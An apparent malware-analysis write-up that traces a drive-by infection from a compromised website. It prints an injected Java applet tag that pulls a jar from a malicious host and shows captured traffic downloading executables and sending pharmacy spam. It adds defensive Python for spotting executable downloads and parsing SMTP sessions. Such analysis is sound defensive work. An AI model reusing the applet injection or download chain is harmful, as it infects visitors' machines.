John has informed us about another website that may be infected:
hxxp://www.knowmore. org
A quick scan with vscan.urlvoid.com reports that the site is infected:
Report 2011-03-19 01:20:31 (GMT 1)
File Name knowmore-org
File Size 22121 bytes
File Type Unknown file
MD5 Hash d29b303c72a2330ac13155be0b280221
SHA1 Hash 3cf9d0637551e0ce5ac7a9ce243b35e13caf5e80
Detections: 3 / 9 (33 %)
Status INFECTED
We have dumped the content of the website:
So we have browsed the website in our test environment and this is the result:
GET /count11.php HTTP/1.0
Referer: hxxp://knowmore. org/
Host: maribit. com

GET /in.php?a=QQkFBg0DBwYNAwwFEkcJBQYNDAYMAwQNAA== HTTP/1.0
Referer: hxxp://knowmore. org/
Host: kagrinn.cz. cc
Now there is an attempt to load a Java applet:
<applet code='lort.cooter.class' archive='hxxp://kagrinn.cz. cc/efrthyjkfyiguytdsfsxz.jar' width='300' height='150'>
New network traffic:
GET /out.php?a=QQkFBg0DBwYNAwwFEkcJBQYNDAYMAwQNAA==&p=6 HTTP/1.0
Host: kagrinn.cz. cc
Response:
HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 19 Mar 2011 00:54:42 GMT
Content-Type: application/octet-stream
Connection: keep-alive
X-Powered-By: PHP/5.3.5
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Accept-Ranges: bytes
Content-Length: 17920
Content-Disposition: inline; filename=setup.exe
MZ.............
The executable file setup.exe is downloaded:
Report date: 2011-03-19 02:21:05 (GMT 1)
File name: setup.exe
File size: 17920 bytes
MD5 hash: 192b0b0d37d3a6666b584e876ca271e5
SHA1 hash: 7ca0e9f10a3cef8a7cc8b7831f675bd7089648f4
Detection rate: 0 of 9 (0%)
Another executable file is downloaded:
GET /client1.exe HTTP/1.0
Host: tamarer. com

HTTP/1.1 200
Server: Apache
Content-Length: 650240
Content-Type:
Last-Modified: Sat, 19 Mar 2011 00:55:16 GMT
Accept-Ranges: bytes
Server: nginx/0.8.34
Date: Fri, 18 Mar 2011 21:54:54 GMT
Last-Modified: Sat, 19 Mar 2011 00:52:41 GMT
Accept-Ranges: bytes
MZ.................
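Both responses above carry the traits a proxy or IDS rule would key on: a PE body (the MZ magic) served as an "inline" octet-stream with an .exe filename in the first case, and an empty Content-Type plus duplicated Server/Last-Modified headers from two different servers in the second. The following Python is an added example (not code from the original post) that reassembles the two captured responses as constructed samples, with CRLF line endings restored and the body cut down to the PE magic, and reports which of those indicators each one triggers.

```python
import re

# Constructed samples, rebuilt from the two responses captured in the
# write-up: CRLF line endings restored, body truncated to the PE magic.
SETUP_EXE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: nginx/0.8.54\r\n"
    b"Date: Sat, 19 Mar 2011 00:54:42 GMT\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"Connection: keep-alive\r\n"
    b"X-Powered-By: PHP/5.3.5\r\n"
    b"Cache-Control: no-cache, must-revalidate\r\n"
    b"Expires: Sat, 26 Jul 1997 05:00:00 GMT\r\n"
    b"Accept-Ranges: bytes\r\n"
    b"Content-Length: 17920\r\n"
    b"Content-Disposition: inline; filename=setup.exe\r\n"
    b"\r\n"
    b"MZ\x90\x00\x03\x00\x00\x00"
)

CLIENT1_EXE_RESPONSE = (
    b"HTTP/1.1 200\r\n"
    b"Server: Apache\r\n"
    b"Content-Length: 650240\r\n"
    b"Content-Type:\r\n"
    b"Last-Modified: Sat, 19 Mar 2011 00:55:16 GMT\r\n"
    b"Accept-Ranges: bytes\r\n"
    b"Server: nginx/0.8.34\r\n"
    b"Date: Fri, 18 Mar 2011 21:54:54 GMT\r\n"
    b"Last-Modified: Sat, 19 Mar 2011 00:52:41 GMT\r\n"
    b"Accept-Ranges: bytes\r\n"
    b"\r\n"
    b"MZ\x90\x00\x03\x00\x00\x00"
)

EXECUTABLE_EXTENSIONS = (".exe", ".dll", ".scr", ".jar")


def parse_response(raw):
    """Split a raw HTTP response into (status line, [(name, value)], body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, body


def executable_download_indicators(raw):
    """Return the list of reasons this response looks like a PE drop."""
    _status, headers, body = parse_response(raw)
    reasons = []
    by_name = {}
    for name, value in headers:
        by_name.setdefault(name, []).append(value)

    # Two origin servers answering in one response (Apache and nginx, two
    # Last-Modified values) points at a proxy or redirector in the chain.
    for name, values in by_name.items():
        if len(values) > 1:
            reasons.append("duplicate header: " + name)

    content_type = by_name.get("content-type", [""])[0].lower()
    disposition = by_name.get("content-disposition", [""])[0]
    match = re.search(r'filename="?([^";]+)', disposition)
    filename = match.group(1).strip() if match else ""
    if filename.lower().endswith(EXECUTABLE_EXTENSIONS):
        reasons.append("executable filename in Content-Disposition: " + filename)
        if disposition.lower().startswith("inline"):
            reasons.append("executable offered as inline content")

    if body.startswith(b"MZ"):
        reasons.append("body starts with PE magic (MZ)")
        if not content_type:
            reasons.append("PE body with empty Content-Type")
        elif not content_type.startswith("application/"):
            reasons.append("PE body with non-binary Content-Type: " + content_type)
    return reasons


if __name__ == "__main__":
    for label, raw in (("setup.exe", SETUP_EXE_RESPONSE),
                       ("client1.exe", CLIENT1_EXE_RESPONSE)):
        print(label)
        for reason in executable_download_indicators(raw):
            print("  -", reason)
```

The check deliberately looks at the body magic rather than trusting the headers alone: the second download declares no Content-Type at all, so a rule keyed only on `application/octet-stream` would have missed it.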
Files created during the infection:
c:\DOCUME~1\ADMINI~1\IMPOST~1\Temp\setup.exe
c:\DOCUME~1\ADMINI~1\IMPOST~1\Temp\MPC5.tmp
c:\WINDOWS\Temp\_ex-68.exe
c:\WINDOWS\system32\Packet.dll
c:\WINDOWS\system32\wpcap.dll
c:\WINDOWS\system32\drivers\npf.sys
Report date: 2011-03-19 02:36:06 (GMT 1)
File name: ex-68-exe
File size: 650240 bytes
MD5 hash: 32f73e995554b8e601c0da661e9a4edb
SHA1 hash: 237cafc9c7c30adee5ac795afd4371fbc19aa41d
Detection rate: 0 of 9 (0%)
Other curious network traffic:
GET /FlopK4F8XFP3oZ1PmQ.htm HTTP/1.1
Host: 98.232.48.112
Content-Length: 594
User-Agent: Mozilla/5.0 (X11; U; NetBSD alpha; en-US; rv:1.8) Gecko/20060107 Firefox/1.5
Now the malware tries to send spam messages:
220 Comendo Mailfence V3
HELO XXX
250 ec3-node2.net.comendo.com says HELO to XXX:53746
MAIL FROM:<xxx@alcatel-lucent.com>
250 MAIL FROM accepted
RCPT TO:<xxx@lpmail.com>
250 RCPT TO accepted
DATA
354 continue. finished with "\r\n.\r\n"
[...]
Subject: Bring extra pleasance to your xxx-life!
[...]
FDA-approved blue-blu-colored med to heal ED! hxxp://healthcontrol. dk/jhkop806.html
[...]
So the spam message contains an HTTP link:
healthcontrol. dk/jhkop806.html
That redirects to:
pillrxdrugstorechains. at
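When a sandbox run produces an SMTP transcript like the one above, the useful output for the incident record is the envelope (forged sender, recipient), the Subject line, the links in the body in defanged form, and whether the relay actually accepted the message. The Python below is an added example, not code from the original post: it walks the captured dialogue reassembled as a constructed sample, in which the parts the write-up elides with [...] are filled with made-up minimal headers, a body line carrying the spam link, and a made-up close of the session (250 / QUIT / 221) that does not come from the capture.

```python
import re

# Constructed sample: the SMTP session captured above, one line per exchange.
# The [...] gaps are filled with made-up headers, a body line carrying the
# spam link and a made-up session close; none of those lines are from the
# capture.
CAPTURED_SMTP = r"""220 Comendo Mailfence V3
HELO XXX
250 ec3-node2.net.comendo.com says HELO to XXX:53746
MAIL FROM:<xxx@alcatel-lucent.com>
250 MAIL FROM accepted
RCPT TO:<xxx@lpmail.com>
250 RCPT TO accepted
DATA
354 continue. finished with "\r\n.\r\n"
From: xxx@alcatel-lucent.com
To: xxx@lpmail.com
Subject: Bring extra pleasance to your xxx-life!

FDA-approved blue-blu-colored med to heal ED! hxxp://healthcontrol.dk/jhkop806.html
.
250 OK queued
QUIT
221 Bye
"""

# Accept live (http) and already-defanged (hxxp) links alike.
URL_RE = re.compile(r'h(?:tt|xx)ps?://[^\s<>"]+', re.IGNORECASE)
ADDR_RE = re.compile(r"<([^>]*)>")


def defang(url):
    """Render a URL so it cannot be clicked: hxxp scheme, [.] in the host."""
    scheme, _, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    scheme = "hxxps" if scheme.lower().endswith("s") else "hxxp"
    return scheme + "://" + host.replace(".", "[.]") + slash + path


def parse_smtp_session(transcript):
    """Walk a client/server SMTP transcript and pull out the envelope,
    the Subject header, every URL in the message body and whether the
    relay accepted the message (a 250 reply after the lone "." line)."""
    session = {"helo": None, "mail_from": None, "rcpt_to": [],
               "subject": None, "urls": [], "accepted": False}
    in_data = False           # between the 354 reply and the lone "." line
    awaiting_verdict = False  # "." sent, waiting for the server's 250/5xx
    for line in transcript.splitlines():
        if in_data:
            if line == ".":
                in_data, awaiting_verdict = False, True
            elif line.lower().startswith("subject:"):
                session["subject"] = line.split(":", 1)[1].strip()
            session["urls"].extend(defang(u) for u in URL_RE.findall(line))
            continue
        if awaiting_verdict and line[:3].isdigit():
            session["accepted"] = line.startswith("250")
            awaiting_verdict = False
            continue
        upper = line.upper()
        if upper.startswith(("HELO ", "EHLO ")):
            session["helo"] = line.split(None, 1)[1].strip()
        elif upper.startswith("MAIL FROM:"):
            m = ADDR_RE.search(line)
            session["mail_from"] = m.group(1) if m else None
        elif upper.startswith("RCPT TO:"):
            m = ADDR_RE.search(line)
            if m:
                session["rcpt_to"].append(m.group(1))
        elif line.startswith("354"):
            in_data = True
    return session


if __name__ == "__main__":
    for key, value in parse_smtp_session(CAPTURED_SMTP).items():
        print("%-10s %s" % (key, value))
```

The envelope sender domain (alcatel-lucent.com) is unrelated to the infected host, which is the usual sign of a bot sending on a forged identity; the "accepted" flag tells you whether that relay queued the message, which matters when deciding whom to notify.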
URLVoid domain analyses:
http://www.urlvoid.com/scan/kagrinn.cz.cc
http://www.urlvoid.com/scan/knowmore.org
http://www.urlvoid.com/scan/tamarer.com
http://www.urlvoid.com/scan/healthcontrol.dk
http://www.ipvoid.com/scan/98.232.48.112
http://www.urlvoid.com/scan/pillrxdrugstorechains.at